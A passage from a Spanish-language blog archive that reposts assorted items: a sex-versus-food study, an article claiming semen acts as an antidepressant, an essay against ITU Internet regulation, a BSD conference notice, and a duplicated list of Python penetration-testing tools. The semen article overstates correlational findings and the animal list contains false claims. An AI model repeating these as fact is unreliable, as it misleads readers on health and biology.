parejas. "Las parejas modernas lo son a la vez en términos de
distribución de las tareas domésticas y en cuanto a su percepción del
matrimonio", menos sagrada, explicó Hansen, señalando que es una
cuestión de "valores".
"En esas parejas modernas, las mujeres tienen a menudo un alto nivel
de educación y un trabajo bien pagado, lo que las hace menos
dependientes económicamente de sus maridos. Por lo tanto, pueden hacer
frente con mayor facilidad en caso de divorcio", añadió.
En Noruega, la educación de los niños se reparte generalmente de
manera equitativa entre el padre y la madre (siete de cada diez
parejas), señaló Hansen, quien fue entrevistado en un parque mientras se
ocupaba de sus hijos.
Sin embargo, en siete de cada diez casos, las mujeres dedican más tiempo que los hombres a las tareas domésticas.
14 noviembre 2012
Sexo o comida: ¿qué prefieren los hombres?
Nadie sabe cuál es la verdadera "idea fija".
El saber popular indica que “los hombres tienen la idea fija”, que sólo piensan en sexo. Que prefieren una maratón sexual a un banquete apoteósico. ¿Es cierto? Justamente esa pregunta es la que un equipo de investigadores de la Universidad de Ohio se propuso responder. Y el hallazgo fue una verdadera sorpresa para el mundo.
Según el estudio, por más macho y semental que sea el hombre, su preocupación mayor no es qué llevarse a la cama sino qué llevarse a la boca. La mente masculina, explica el documento, tiene más patente una hamburguesa completa que un revolcón porque existen más mecanismos de activación para pensar en comida, como la visión y el olfato, que disparadores para pensar en sexo.
En la investigación participaron 283 estudiantes, 163 mujeres y 120 varones a los que se les pidió que lleven consigo un contador para registrar la cantidad de veces que pensaban en comida o en sexo.
No obstante la conclusión del estudio, se registraron importantes diferencias entre unos pocos individuos censados. Por ejemplo, mientras que un estudiante anotó un solo pensamiento sexual en un día, otro marcó 388 en 24 horas. El promedio masculino de pensamientos relacionados con el sexo es de 18 al día, y el femenino, de 10.
Terri Fisher, la psicóloga a cargo del proyecto, explica que “existen muchos mitos alrededor del sexo y la gran mayoría no tiene relación con la realidad”. Que los hombres sólo tienen sexo en la cabeza es uno de ellos, y esta investigación se encargó de desmentirlo.
Según el estudio, por más macho y semental que sea el hombre, su preocupación mayor no es qué llevarse a la cama sino qué llevarse a la boca. La mente masculina, explica el documento, tiene más patente una hamburguesa completa que un revolcón porque existen más mecanismos de activación para pensar en comida, como la visión y el olfato, que disparadores para pensar en sexo.
En la investigación participaron 283 estudiantes, 163 mujeres y 120 varones a los que se les pidió que lleven consigo un contador para registrar la cantidad de veces que pensaban en comida o en sexo.
No obstante la conclusión del estudio, se registraron importantes diferencias entre unos pocos individuos censados. Por ejemplo, mientras que un estudiante anotó un solo pensamiento sexual en un día, otro marcó 388 en 24 horas. El promedio masculino de pensamientos relacionados con el sexo es de 18 al día, y el femenino, de 10.
Terri Fisher, la psicóloga a cargo del proyecto, explica que “existen muchos mitos alrededor del sexo y la gran mayoría no tiene relación con la realidad”. Que los hombres sólo tienen sexo en la cabeza es uno de ellos, y esta investigación se encargó de desmentirlo.
13 noviembre 2012
El semen es un antidepresivo natural (y otras virtudes evolutivas de la semilla humana)
Estudios científicos muestran que el semen actúa como una droga psicoactiva en el cuerpo de las mujeres, mejorando su estado de ánimo y sus habilidades cognitivas; las bondades del semen parecen estar relacionadas con ventajas evolutivas
La vida parece ser dueña de una inteligencia secreta que despliega sutilmente para asegurar su existencia y evolución hacia una mayor complejidad. Una forma de hacer esto en los seres humanos es haciendo del semen una especie de droga psicoactiva, cuyos efectos benéficos hacen que las mujeres sientan la necesidad de recibir esta semilla de luz líquida (en cierta forma hacerlas adictas a la vida, a generar vida, a través de esta sustancia y del estrecho vínculo que provoca). Aunque a primera vista esto podría parecer como un hiperbólico canto falocrático a las virtudes del semen, la realidad científica es que el semen actúa como una droga psicoactiva en el cuerpo de las mujeres.
El descubrimiento de que el semen actúa como un antidepresivo natural se debe al Dr. Gordon Gallup y a la Dra. Rebecca Burch de la Universidad Estatal de Nueva York. Gallup se topó en los años 90 con el intrigante dato de que a diferencia de las mujeres heterosexuales sexualmente activas viviendo juntas, lesbianas sexualmente involucradas no exhibían el famoso “efecto McClintok”, en el que se sincronizan los ciclos menstruales de mujeres que cohabitan el mismo espacio (al igual que hembras de otras especies). Ya que se sabe que las señales olfatorias o feromonas median la sincronía menstrual.
Ante este fenómeno, Gallup y su colega se preguntaron: “Ya que se espera que las lesbianas estén en una relación más cerca e íntima cotidianamente que otras mujeres que viven juntas, ¿qué es lo que ocurre en las mujeres heterosexuales que promueve la sincronía menstrual o qué es lo que ocurre en las lesbianas que impide la sincronía menstrual? Se nos ocurrió que una característica que distingue a las mujeres heterosexuales de las lesbianas es la presencia de semen en las vías reproductivas femeninas. Las lesbianas tienen sexo libre de semen”.
Gallup y Burch dedujeron entonces que ciertos químicos en el semen humano afectan la biología femenina a través de la absorción vaginal, de forma tal que las mujeres que tienen sexo sin condón literalmente huelen diferente que las mujeres que no tienen sexo sin condón, o al menos sus cuerpos emiten feromonas que empalman los ciclos menstruales de mujeres cohabitantes.
Como apunta Jesse Bering en el sitio de la revista Scientific America, los médicos saben desde hace mucho que la vagina es una ruta ideal para la administración de drogas. Esto debido a que la vagina está rodeada de una red vascular: arterias, vasos sanguíneos, vasos linfáticos y, a diferencia de otras rutas de administración de drogas o medicamentos, los químicos que se absorben vía vaginal tienen una línea casi directa con el sistema circulatorio periférico.
Ya que el semen contiene más de 50 sustancias químicas, hace sentido que al ser insertado en la vagina haga efecto en la biología femenina. El complicado perfil químico del semen incluye una serie de hormonas, neurotransmisores, endorfinas e inmunosupresores, cada uno con una función específica y ocurriendo en diferentes concentraciones dentro del plasma seminal. Dentro del cóctel químico (o alquímico, según se vea) del semen se encuentran varios compuestos que afectan el estado de ánimo, incluyendo, cortisol (incrementa el afecto), estrona (eleva el estado de ánimo), prolacitina (funciona como un antidepresivo natural), oxitocina (eleva el estado de ánimo y genera un sentimiento de apego; se le conoce como “la hormona del amor”), hormona liberadora de tirotropina (también un antidepresivo natural), melatonina (hormona que regula el sueño), y hasta serotonina (el neurotransmisor antidepresivo más conocido).
Para probar su hipótesis de que el semen funciona como un antidepresivo, Gallup y Burch hicieron un estudio con 293 mujeres en el campus de la Universidad Estatal de Nueva York. Las participantes del estudio contestaron un cuestionario sobre su comportamiento sexual reciente, incluyendo su uso de condones. Cada participante también completó el Beck Depression Inventory, una prueba usada comúnmente para determinar la presencia de síntomas depresivos.
Los resultados mostraron que las mujeres que tenían relaciones sexuales y “nunca” usaban condones mostraron significativamente menos síntomas depresivos que aquellas que los usaban “a veces” o “siempre”. Estas mujeres que no usaban condón también evidenciaron menos síntomas depresivos que las mujeres que no tenían relaciones sexuales. Significativamente, las mujeres que usaban condón y tenían una vida sexual activa manifestaron síntomas depresivos en la misma medida que las mujeres que se abstenían de tener sexo. Lo que sugiere que no es sólo el sexo lo que hace más felices a las mujeres, sino el flujo seminal pulsando en sus venas.
El mismo estudio mostró que sólo el 4.5% de las mujeres que “nunca” usaban condón consideraban la posibilidad de suicidarse, mientras que 28.9% de la que lo usaban dijeron considerar “a veces” el suicido, mientras que el 13.2% de las que “siempre” usaban condón consideraba el suicidio como una opción.
Aunque no pudimos encontrar el link, Jesse Bering en Scientific America escribe que dentro de uno de los estudios del Dr. Gallup encontró que “las mujeres expuestas al semen se desempeñan mejor en pruebas cognitivas y de aprendizaje”, lo que parece sugerir que el semen no sólo hace felices a las mujeres, también mejora sus aptitudes intelectuales.
Y parece que el semen no sólo tiene efectos sobre la psique de las mujeres, también en los hombres que tienen relaciones homoeróticas sin condón. En un estudio realizado por los investigadores canadienses Dave Holmes y Dan Warner, en el que entrevistaron a hombres gay sobre las razones por las cuales preferían el sexo anal sin condón, una respuesta común fue que el intercambio de semen les suministraba una sensación de “conexión”, que sólo se daba con la eyaculación interna. Aunque esto podría ser una transferencia emocional lacaniana, está también el caso de la tribú Sambia en Papua Nueva Guinea, en la que los niños son sometidos a rituales de ingesta de semen como parte de su paso a la adolescencia. A los 11 y 12 años muchos de estos jóvenes buscan activamente realizar felaciones para obtener el semen y masculinizar sus cuerpos. Aunque esto es parte de un contexto de significación cultural, también es posible que la testosterona del plasma seminal entre a la mucosa oral proveyendo a estos jóvenes de su buscada “masculinidad” y no sólo sea un hecho simbólico.
La química del semen también parece ofrecer otra ventaja evolutiva además de su psicodinámica. A diferencia de otras especies los hombres no cuentan con señales externas para descubrir sus posibilidades de embarazar a una mujer (al menos de que tenga el más refinado olfato, difícilmente podrán percibir que una mujer está en su período de fertilidad). Convenientemente el semen produce dos hormonas femeninas, la hormna luteinizante y la hormona foliculoestimulante. Como contradefensa a la ovulación oculta de las mujeres, estas hormonas ayudan a los óvulos femeninos prematuros a madurar. La hormona luteinizante detona la ovulación y la hormona foliculoestimulante precipita su maduración. Esto hace que la cópula pueda en ocasiones producir ovulación en puntos del ciclo menstrual donde esto no ocurriría. Como todas las drogas, el semen también produce un síndrome de abstinencia. Gallup encontró que las mujeres que tenían sexo sin condón experimentan una depresión más profunda al cortar una relación de pareja que las mujeres que no estaban expuestas al semen de su ex. Estas mujeres expuestas al semen buscan más rápido parejas sexuales presumiblemente para recibir su dosis de semen y medicar su depresión.
“El plasma seminal evolucionó para controlar y manipular el sistema reproductivo femenino para que trabaje en el mejor interés de su donador, el hombre”, dice Gallup. “Si empiezas a pensar sobre el semen en estos términos, el hecho de que el semen pueda ser un antidepresivo se vuelve muchos más interesante ya que puede promover la vinculación entre una mujer y su pareja sexual”.
Gallup actualmente se encuentra estudiando el efecto del estado mental de un hombre al momento de eyacular por la composición de su semen. Es posible que ciertas muestras de semen puedan ser potenciadas por el estado mental del sujeto que las produce. Algunos hombres tal vez sean capaces de producir una especie de elixir (El mago Aleister Crowley usaba el semen para prepara sus llamados Pasteles de Luz, una especie ostia cósmica para comunicarse con el mundo astral) mientras que otros solamente producen una versión poco concentrada de esta droga psicoactiva que se encuentra en sus testículos.
No es nuestra intención, sin embargo, suscitar expresiones del tipo “No soy doctor, pero mis testículos son proveedores farmacéuticos con licencia” o un sinnúmero de albures científicos que se pueden generar con este “Prozac en la próstata”. Tampoco llamar al sexo universal sin condón para un mundo mejor, más feliz y colocado. Evidentemente el sexo sin condón y sus mieles deben de estar reservados a la madurez emocional y a las responsabilidad social.
Por último sería interesante descubrir si la mucosa vaginal tiene algún efecto en la psicobiología del hombre, aunque el pene evidentemente no sea una vía de ingestión tan efectiva como la vagina. No debe ser raro que esta sustancia (los químicos producidos por la mujer durante el acto sexual) tenga alguna ventaja evolutiva en el hombre.
Con información de Scientific America y de PopsSci
Tomado de: http://pijamasurf.com/2011/05/el-semen-es-un-antidepresivo-natural-y-otras-virtudes-psicoevolutivas-de-la-semilla-del-hombre/
12 noviembre 2012
UIT regulando Internet es un peligro para los usuarios
El mes que viene, se realiza la 12 Conferencia Mundial de Telecomunicaciones Internacionales (WCIT-12) en Dubai. La organiza la Unión Internacional de Telecomunicaciones (UIT),
el organismo de las Naciones Unidas que se creó para promover
estándares para telegrafía y telefonía internacional, cuando esas
tecnologías eran lo último de lo último, y que hoy administra algunos
recursos globales de comunicación, como bandas satelitales. Hace un
tiempo ya que se escucha el rumor de una movida para otorgale a la UIT
la “regulación global” de Internet, mientras que la UIT misma se
encargaba de desmentirlo.
Ahora aparece en la revista Wired un artículo en el que el Dr. Hamadoun Touré, Secretario General de la UIT, nos dice que “La UIT debe liderar el esfuerzo de regulación de Internet“, lo que cambia radicalmente el discurso oficial.
Lo del Artículo 34 de la Constitución de la UIT otorgando ya ese derecho es, por lo demás, una falacia. Esa Constitución fue redactada pensando en la función regulatoria de la UIT en el terreno de la telegrafía, el teléfono y las radiocomunicaciones, y la soberanía de los países sobre esos recursos en su territorio. Un marco regulatorio internacional para un medio global como Internet llevaría a que la ley de cada país fuera aplicable a todos los demás, permitiendo al gobierno del país A demandar alguien que vive en el país B por publicar materiales que en su país son legales.
Estas empresas no sólo son altamente rentables, sino que la “demanda explosiva” de sus servicios les pinta un futuro brillante tanto a corto como a mediano y largo plazo. El problema es que, aún yéndoles muy bien, están celosas porque hay usuarios de sus servicios a los que les va mejor aún, y por eso llevan años intentando romper la neutralidad de la red para poder cobrarle a las empresas de Internet no sólo por el tráfico de datos (como hoy ya hacen) sino además haciéndolas competir por el trato preferencial de ese tráfico.
Un mecanismo por el estilo podría llegar a servir si Internet fuera como la televisión, un medio en el que pocos transmiten y muchos leen. Pero el valor en Internet está, precisamente, en que todos podemos ser tanto receptores como transmisores, y de hecho lo somos, todo el tiempo. Esto es lo que permite que cualquier persona pueda, con recursos muy modestos, crear servicios nuevos y ofrecerlos a los demás usuarios.
Piense en cualquiera de las cosas que hoy hace en Internet: todas y cada una de ellas nació precisamente porque hubo alguien que pudo comenzar a ofrecerla sin obstáculos. Si las telecoms comienzan a cobrar de manera diferenciada para ofrecer un servicio que para acceder a él, la innovación en Internet quedará reservada a las grandes corporaciones que puedan negociar buenos tratos con ellas.
Ahora aparece en la revista Wired un artículo en el que el Dr. Hamadoun Touré, Secretario General de la UIT, nos dice que “La UIT debe liderar el esfuerzo de regulación de Internet“, lo que cambia radicalmente el discurso oficial.
Una Internet para todos
El artículo del Dr. Touré arranca bien, afirmando que la conferencia tratará temas relacionados con mejorar el acceso online y la conectividad para todos. Lamentablemente, desbarranca cuando pasa a detallar tres de esos temas ofreciendo enfoques que, lejos de aportar a ese objetivo, conspiran seriamente en su contra.Ciberseguridad
Arrancando con el cansado cuco de los crímenes en Internet, nos dice el Dr.:Los gobiernos están buscando marcos más efectivos para combatir el fraude y otros crímenes. Algunas personas han sugerido que esos marcos podrían también legitimar la censura. Sin embargo, los Estados Miembros ya tienen el derecho, según el Artículo 34 de la Constitución de la UIT, de bloquear cualquier comunicación privada que parezca “peligrosa para la seguridad del Estado, o contraria a sus leyes, al orden público o a la decencia”. Las regulaciones de los tratados no pueden contradecir la Constitución.Y así vemos que era mentira lo de “una Internet para todos”: con la excusa de combatir el fraude, la idea es que cada país pueda controlar qué es lo que sus ciudadanos pueden ver y decir. Es cierto, algunos países ya lo hacen, desde China a EEUU, pero precisamente esa es la razón por la que no debemos legitimarlo con un tratado internacional.
Muchas autoridades alrededor del mundo intervienen en las comunicaciones por distintas razones—tales como impedir la circulación de pornografía o propaganda extremista. De modo que debemos encontrar un balance entre la protección de la intimidad de las personas y su derecho a comunicarse por un lado, y la protección de individuos, instituciones y economías enteras de actividades criminales.
Lo del Artículo 34 de la Constitución de la UIT otorgando ya ese derecho es, por lo demás, una falacia. Esa Constitución fue redactada pensando en la función regulatoria de la UIT en el terreno de la telegrafía, el teléfono y las radiocomunicaciones, y la soberanía de los países sobre esos recursos en su territorio. Un marco regulatorio internacional para un medio global como Internet llevaría a que la ley de cada país fuera aplicable a todos los demás, permitiendo al gobierno del país A demandar alguien que vive en el país B por publicar materiales que en su país son legales.
Infraestructura
En materia de infraestructura es donde verdaderamente se le ve la pata a la sota, y donde enterramos la idea de “una Internet para todos”:La conferencia se enfocará también en cómo las TICs&emdash;y en particular la banda ancha&emdash;pueden ser catalizadores altamente efectivos para el progreso social y económico sustentable.La parte operativa de esta cita es la de “considerar estrategias relacionadas con distribuir los ingresos de una manera más justa”. Para comprender de qué están hablando, es preciso recordar que UIT es, esencialmente, el terreno de las grandes empresas de comunicaciones, las que proveen ls vínculos por los que transitan los paquetes de Internet.
En este momento, el acceso a este potencial está restringido por cuestiones de precio, con muchos usuarios enfrentando altos costos. Relacionado con esto, no hay suficiente inversión en infraestructura, especialmente en países en desarrollo.
Un factor importante e influyente es el de la financiación de redes, de modo que la conferencia puede considerar estrategias relacionadas con distribuir los ingresos de una manera más justa, estimulando la inversión, haciendo cotidianas las TICs “verdes”, y expandiendo el acceso lo más ampliamente posible para satisfacer una demanda explosiva. Estas soluciones podrían incluir transparencia total en los precios, por ejemplo en el “roaming” celular.
Estas empresas no sólo son altamente rentables, sino que la “demanda explosiva” de sus servicios les pinta un futuro brillante tanto a corto como a mediano y largo plazo. El problema es que, aún yéndoles muy bien, están celosas porque hay usuarios de sus servicios a los que les va mejor aún, y por eso llevan años intentando romper la neutralidad de la red para poder cobrarle a las empresas de Internet no sólo por el tráfico de datos (como hoy ya hacen) sino además haciéndolas competir por el trato preferencial de ese tráfico.
Un mecanismo por el estilo podría llegar a servir si Internet fuera como la televisión, un medio en el que pocos transmiten y muchos leen. Pero el valor en Internet está, precisamente, en que todos podemos ser tanto receptores como transmisores, y de hecho lo somos, todo el tiempo. Esto es lo que permite que cualquier persona pueda, con recursos muy modestos, crear servicios nuevos y ofrecerlos a los demás usuarios.
Piense en cualquiera de las cosas que hoy hace en Internet: todas y cada una de ellas nació precisamente porque hubo alguien que pudo comenzar a ofrecerla sin obstáculos. Si las telecoms comienzan a cobrar de manera diferenciada para ofrecer un servicio que para acceder a él, la innovación en Internet quedará reservada a las grandes corporaciones que puedan negociar buenos tratos con ellas.
Acceso
El artículo termina hablando de la necesidad de reconocer el derecho de los discapacitados a acceder a Internet algo en lo que ITU no tiene en realidad nada que decir, y en lo que los organismos de estándares de la red (W3C, IETF y demás) ya vienen trabajando desde hace años.Debemos mantener a UIT lejos de Internet
Se pueden decir muchas cosas acerca de Internet, pero una es innegable: funciona, y provee el medio de comunicación más democrático del que nuetsra especie tenga memoria. La UIT es un organismo controlado por corporaciones estatales y privadas, precisamente aquellas que más tienen que temer a un medio de esas características, aquellas que van a hacer todo lo que esté en su poder para mantener una estructura asimétrica que las beneficie.Tomado de: http://www.vialibre.org.ar/2012/11/08/uit-regulando-internet-es-un-peligro-para-los-usuarios/
Curiosidades sobre algunos animales
El cocodrilo no puede sacar la lengua
la jirafa no puede emitir sonidos
el león no puede estar despierto más de 5 horas
el pavorreal no puede volar aunque tenga más plumas que ninguna ave
el elefante no puede saltar
el delfín no sabe nadar despacio
la araña denominada viuda negra no sabe de respeto a su pareja, ya que devora al macho en cuanto termina de copularla
el lobo no le teme al hombre pero lo evita
el oso le teme al hombre aunque no lo evita
la morsa le teme al hombre y también lo evita
y el perezoso no sabe defenderse.
la jirafa no puede emitir sonidos
el león no puede estar despierto más de 5 horas
el pavorreal no puede volar aunque tenga más plumas que ninguna ave
el elefante no puede saltar
el delfín no sabe nadar despacio
la araña denominada viuda negra no sabe de respeto a su pareja, ya que devora al macho en cuanto termina de copularla
el lobo no le teme al hombre pero lo evita
el oso le teme al hombre aunque no lo evita
la morsa le teme al hombre y también lo evita
y el perezoso no sabe defenderse.
11 noviembre 2012
No tengo enie
NoTengoEnie, ideal para cuando no funcionan algunas teclas, tenemos el teclado en otro idioma o causa similar y necesitamos ingresar algun caracter especial... Porque los caracteres especiales están para ser usados... 206 caracteres al precio de simplemente disponer de conexion a Internet y que Flash funcione...
http://www.notengoenie.com/
http://www.notengoenie.com/
10 noviembre 2012
BSDday Argentina 2012
BSDday Argentina 2012, Ciudad Autónoma de Buenos Aires
*17 de Noviembre*
Lambaré 873, FM La Tribu
BSDday Argentina es una conferencia para usuarios, administradores de sistemas y desarrolladores de sistemas operativos y software *BSD.
La conferencia esta destinada a cualquier persona que desarrolle, implemente, administre o use sistemas basados en FreeBSD, NetBSD, OpenBSD, DragonFlyBSD y otros *BSD.
BSDday es una serie de conferencias y charlas técnicas hechas por y para desarrolladores, administradores, usuarios e interesados en software y filosofía BSD, y proyectos de software libre relacionados.
La entrada es gratuita y no es necesario registrarse.
link: http://www.bsdday.org.ar/
twitter: @bsdday
Saludos!
BSDday Argentina 2012
BSDday Argentina 2012, Buenos Aires City
*17 Nov*
Lambaré 873, FM La Tribu
BSDday Argentina is a conference for users, sysadmins and developers of BSD software and based systems. The conference is for anyone developing, deploying and using systems based on FreeBSD, NetBSD, OpenBSD, DragonFlyBSD and others *BSD. BSDday Argentina is a technical conference and aims to collect the best technical papers and presentations available to ensure that the latest developments in our open source community are shared with the widest possible audience.
link: http://www.bsdday.org.ar/
twitter: @bsdday
Greetings!
BSDday Argentina 2012
*17 de Noviembre*
Lambaré 873, FM La Tribu
BSDday Argentina es una conferencia para usuarios, administradores de sistemas y desarrolladores de sistemas operativos y software *BSD.
La conferencia esta destinada a cualquier persona que desarrolle, implemente, administre o use sistemas basados en FreeBSD, NetBSD, OpenBSD, DragonFlyBSD y otros *BSD.
BSDday es una serie de conferencias y charlas técnicas hechas por y para desarrolladores, administradores, usuarios e interesados en software y filosofía BSD, y proyectos de software libre relacionados.
La entrada es gratuita y no es necesario registrarse.
link: http://www.bsdday.org.ar/
twitter: @bsdday
Saludos!
BSDday Argentina 2012
BSDday Argentina 2012, Buenos Aires City
*17 Nov*
Lambaré 873, FM La Tribu
BSDday Argentina is a conference for users, sysadmins and developers of BSD software and based systems. The conference is for anyone developing, deploying and using systems based on FreeBSD, NetBSD, OpenBSD, DragonFlyBSD and others *BSD. BSDday Argentina is a technical conference and aims to collect the best technical papers and presentations available to ensure that the latest developments in our open source community are shared with the widest possible audience.
link: http://www.bsdday.org.ar/
twitter: @bsdday
Greetings!
BSDday Argentina 2012
09 noviembre 2012
Herramientas en Python para pruebas de penetracion
Python herramientas para pruebas de penetración ( Python tools for penetration testers)
Visto en http://dirk-loss.de/python-tools.htm
Some of the more aggressive tools (pentest frameworks, bluetooth smashers, web application vulnerability scanners, war-dialers, etc.) are left out, because the legal situation of these tools is still a bit unclear in Germany -- even after the decision of the highest court. This list is clearly meant to help whitehats, and for now I prefer to err on the safe side.
Network
Scapy: send, sniff and dissect and forge network packets. Usable interactively or as a library
pypcap, Pcapy and pylibpcap: several different Python bindings for libpcap
libdnet: low-level networking routines, including interface lookup and Ethernet frame transmission
dpkt: fast, simple packet creation/parsing, with definitions for the basic TCP/IP protocols
Impacket: craft and decode network packets. Includes support for higher-level protocols such as NMB and SMB
pynids: libnids wrapper offering sniffing, IP defragmentation, TCP stream reassembly and port scan detection
Dirtbags py-pcap: read pcap files without libpcap
flowgrep: grep through packet payloads using regular expressions
httplib2: comprehensive HTTP client library that supports many features left out of other HTTP libraries
Debugging and reverse engineering
Paimei: reverse engineering framework, includes PyDBG, PIDA, pGRAPH
Immunity Debugger: scriptable GUI and command line debugger
IDAPython: IDA Pro plugin that integrates the Python programming language, allowing scripts to run in IDA Pro
PyEMU: fully scriptable IA-32 emulator, useful for malware analysis
pefile: read and work with Portable Executable (aka PE) files
pydasm: Python interface to the libdasm x86 disassembling library
PyDbgEng: Python wrapper for the Microsoft Windows Debugging Engine
uhooker: intercept calls to API calls inside DLLs, and also arbitrary addresses within the executable file in memory
diStorm64: disassembler library for AMD64, licensed under the BSD license
python-ptrace: debugger using ptrace (Linux, BSD and Darwin system call to trace processes) written in Python
Fuzzing
Sulley: fuzzer development and fuzz testing framework consisting of multiple extensible components
Peach Fuzzing Platform: extensible fuzzing framework for generation and mutation based fuzzing
antiparser: fuzz testing and fault injection API
TAOF, including ProxyFuzz, a man-in-the-middle non-deterministic network fuzzer
untidy: general purpose XML fuzzer
Powerfuzzer: highly automated and fully customizable web fuzzer (HTTP protocol based application fuzzer)
FileP: file fuzzer. Generates mutated files from a list of source files and feeds them to an external program in batches
SMUDGE
Mistress: probe file formats on the fly and protocols with malformed data, based on pre-defined patterns
Fuzzbox: multi-codec media fuzzer
Forensic Fuzzing Tools: generate fuzzed files, fuzzed file systems, and file systems containing fuzzed files in order to test the robustness of forensics tools and examination systems
Windows IPC Fuzzing Tools: tools used to fuzz applications that use Windows Interprocess Communication mechanisms
WSBang: perform automated security testing of SOAP based web services
Construct: library for parsing and building of data structures (binary or textual). Define your data structures in a declarative manner
fuzzer.py (feliam): simple fuzzer by Felipe Andres anzano
Web
ProxMon: processes proxy logs and reports discovered issues
WSMap: find web service endpoints and discovery files
Twill: browse the Web from a command-line interface. Supports automated Web testing
Windmill: web testing tool designed to let you painlessly automate and debug your web application
FunkLoad: functional and load web tester
Forensics
Volatility: extract digital artifacts from volatile memory (RAM) samples
SandMan: read the hibernation file, regardless of Windows version
LibForensics: library for developing digital forensics applications
TrIDLib, identify file types from their binary signatures. Now includes Python binding
Malware analysis
pyew: command line hexadecimal editor and disassembler, mainly to analyze malware
Didier Stevens' PDF tools: analyse, identify and create PDF files (includes PDFiD, pdf-parser and make-pdf and mPDF)
Origapy: Python wrapper for the Origami Ruby module which sanitizes PDF files
Exefilter: filter file formats in e-mails, web pages or files. Detects many common file formats and can remove active content
pyClamAV: add virus detection capabilities to your Python software
Misc
InlineEgg: toolbox of classes for writing small assembly programs in Python
Exomind: framework for building decorated graphs and developing open-source intelligence modules and ideas, centered on social network services, search engines and instant messaging
RevHosts: enumerate virtual hosts for a given IP address
simplejson: JSON encoder/decoder, e.g. to use Google's AJAX API
Other useful libraries and tools
IPython: enhanced interactive Python shell with many features for object introspection, system shell access, and its own special command system
Beautiful Soup: HTML parser optimized for screen-scraping
matplotlib: make 2D plots of arrays
Mayavi: 3D scientific data visualization and plotting
RTGraph3D: create dynamic graphs in 3D
Twisted: event-driven networking engine
Suds: lightweight SOAP client for consuming Web Services
M2Crypto: most complete OpenSSL wrapper
NetworkX: graph library (edges, nodes)
pyparsing: general parsing module
lxml: most feature-rich and easy-to-use library for working with XML and HTML in the Python language
Pexpect: control and automate other programs, similar to Don Libes `Expect` system
Sikuli, visual technology to search and automate GUIs using screenshots. Scriptable in Jython
Red
Scapy : enviar, rastrear y analizar y establecer los paquetes de red. Utilizable de forma interactiva o como una biblioteca
pypcap , Pcapy y pylibpcap : varios enlaces de Python para diferentes libpcap
libdnet : rutinas de bajo nivel de redes, incluida la interfaz de búsqueda y transmisión de la trama Ethernet
dpkt :, la simple creación rápida de paquetes / análisis, con las definiciones de la base de protocolos TCP / IP
Impacket : y decodificar los paquetes de la red de artesanía. Incluye soporte para los protocolos de nivel superior como NMB y SMB
pynids : libnids ofrece envoltorio inhalación, la desfragmentación IP, TCP y arroyo montaje escaneo de puertos de detección
Dirtbags py-pcap : leer archivos pcap sin libpcap
flowgrep : grep a través de paquetes de carga útil el uso de expresiones regulares
httplib2 : completa biblioteca de cliente HTTP que soporta muchas características al margen de otras bibliotecas HTTP
Depuración y la ingeniería inversa
Paimei : Marco de ingeniería inversa, incluye PyDBG , PIDA, PGraph
Inmunidad depurador : secuencias de comandos de GUI y depurador de línea de comandos
IDAPython : IDA Pro plugin que integra el lenguaje de programación Python, lo que permite secuencias de comandos para ejecutar en IDA Pro
PyEMU : totalmente scripts emulador de IA-32, útil para el análisis de malware
Pefile : leer y trabajar con archivos Portable Executable (aka PE)
pydasm : Python interfaz para el libdasm x86 desmontar la colección de
PyDbgEng : Python contenedor para la depuración del motor de Microsoft Windows
uhooker : interceptar llamadas a llamadas a la API dentro de archivos DLL, y también se ocupa de arbitraria en el archivo ejecutable en la memoria
diStorm64 : desensamblador colección para AMD64, licenciado bajo la licencia BSD
python-ptrace : usando ptrace depurador (Linux, BSD y Darwin llamada al sistema para rastrear procesos) escrito en Python
Fuzzing
Sulley : desarrollo fuzzer marco de pruebas y la pelusa que consiste de varios componentes extensibles
Melocotón fuzzing Plataforma : fuzzing marco extensible para la generación y la mutación basada fuzzing
antiparser : pruebas de pelusa y la inyección de fallos de la API
TAOF , incluyendo ProxyFuzz , una en-el-medio-no determinista red fuzzer-hombre
desordenado : el propósito fuzzer XML generales
Powerfuzzer : altamente automatizada y completamente fuzzer web personalizable (protocolo basado fuzzer solicitud HTTP)
Filep : fuzzer archivo. Genera mutado archivos de una lista de archivos de origen y se alimenta a un programa externo en lotes
Mancha
Maestra : archivo en formato sonda sobre la marcha y los protocolos con los datos con formato incorrecto, basándose en patrones pre-definidos
Fuzzbox : codec de los medios de comunicación multi-fuzzer
Forense fuzzing Herramientas : generar archivos de fuzz, los sistemas de archivos fuzz, y sistemas de archivos que contienen los archivos de fuzz para poner a prueba la solidez de las herramientas de análisis forense y sistemas de examen
Windows IPC fuzzing Herramientas : herramientas utilizadas para pelusa de las aplicaciones que utilizan Windows mecanismos de comunicación entre procesos
WSBang : realizar pruebas de seguridad automatizadas de servicios web basados en SOAP
Construir : biblioteca para el análisis y la construcción de estructuras de datos (binario o de texto). Definir las estructuras de datos de forma declarativa
fuzzer.py (feliam) : fuzzer simple por Felipe Andrés Anzano
Web
ProxMon : proxy procesos de registros e informes de los problemas detectados
WSMap : encontrar el servicio web, los puntos finales y los archivos de descubrimiento
Sarga : navegar por la Web desde una interfaz de línea de comandos. Soporta pruebas automatizadas Web
Molino de viento : prueba de la herramienta web diseñada para que pueda sin dolor automatizar y depurar la aplicación Web
FunkLoad : web, probador de carga y funcional
Forense
Volatilidad : extracto de distorsiones digitales de memoria volátil (RAM) de las muestras
SandMan : leer el archivo de hibernación, independientemente de la versión de Windows
LibForensics : biblioteca para desarrollar aplicaciones de análisis forense digital
TrIDLib , identificar tipos de archivo de sus firmas binarias. Ahora incluye Python
Análisis de malware
pyew : línea de comandos de editor hexadecimal y desensamblador, principalmente para analizar malware
Stevens PDF herramientas Didier : analizar, identificar y crear archivos PDF (incluye PDFiD , pdf-parser y pdf-hacer y MPDF)
Origapy : Python Ruby contenedor para el módulo de Origami que desinfecta archivos PDF
Exefilter : formatos de archivo de filtro de e-mails, páginas web o archivos. Detecta muchos formatos de archivo comunes y pueden eliminar el contenido activo
pyClamAV : añadir capacidades de detección de virus para su software Python
Otros
InlineEgg : caja de herramientas de clases para escribir conjunto de pequeños programas en Python
Exomind : marco para la creación de gráficos decoradas y desarrollo de fuentes de inteligencia módulos abiertos y las ideas, centrada en servicios de redes sociales, motores de búsqueda y mensajería instantánea
RevHosts : enumerar las máquinas virtuales para una determinada dirección IP
simplejson : codificador / decodificador de JSON, por ejemplo, para el uso de AJAX API de Google
Otras bibliotecas y herramientas útiles
IPython : Python shell interactivo mejorado con muchas características para la introspección de objetos, acceso a shell del sistema, y su especial sistema de mando propia
Hermosa sopa : analizador HTML optimizados para la pantalla-raspando
matplotlib : hacer diagramas 2D de matrices
Mâyâvi : visualización científica de datos 3D y el trazado
RTGraph3D : crear gráficos dinámicos en 3D
